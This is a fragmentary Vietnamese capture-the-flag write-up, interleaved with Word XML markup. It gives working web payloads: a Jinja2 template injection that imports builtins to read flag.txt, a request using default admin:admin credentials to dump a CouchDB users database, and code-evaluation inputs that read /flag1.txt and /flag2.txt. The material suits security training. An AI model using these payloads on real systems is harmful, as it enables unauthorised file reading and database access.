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mở link và nhập dãy sau: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 request.application.__globals__.__builtins__.__import__('builtins').open('flag.txt', 'r').read() }}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nhận flag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91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b1: nhập vào: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http://admin:admin@couchDB:5984/users/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId9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_all_docs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nó sẽ hiện ra như vậy</w:t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{"total_rows":3,"offset":0,"rows":[ {"id":"cadaaa3d9dbd8b722047646be9000a37","key":"cadaaa3d9dbd8b722047646be9000a37","value":{"rev":"1-a17f8d2f8fc40647e8962114d7ba8ba8"}}, {"id":"cadaaa3d9dbd8b722047646be9001226","key":"cadaaa3d9dbd8b722047646be9001226","value":{"rev":"1-5e5434ec7ce02e266a48fcc649f7084d"}}, {"id":"cadaaa3d9dbd8b722047646be9001c61","key":"cadaaa3d9dbd8b722047646be9001c61","value":{"rev":"1-4869acff9c14c9bc5705c894053a32a8"}} ]}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sau đó thay _all_docs bằng các id ở trên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thay đến cái thứ 3 sẽ hiện ra flag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943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z w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mở link đầu tiên và nhập vào máy tính : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open("/flag2.txt").read()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mở link thứ 2 và nhập vào máy tính: open("/flag1.txt").read()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flag = flag1+flag2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vd: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98d11d95718a979669cb1b0ac81707c94b22283f20fb33354f7e741f0b80a9a075ba5d266eb33ff0d9d187210e89186b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://admin:admin@couchdb:5984/users/_all_docs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yperlink" Target="http://admin:admin@couchdb:5984/users/_all_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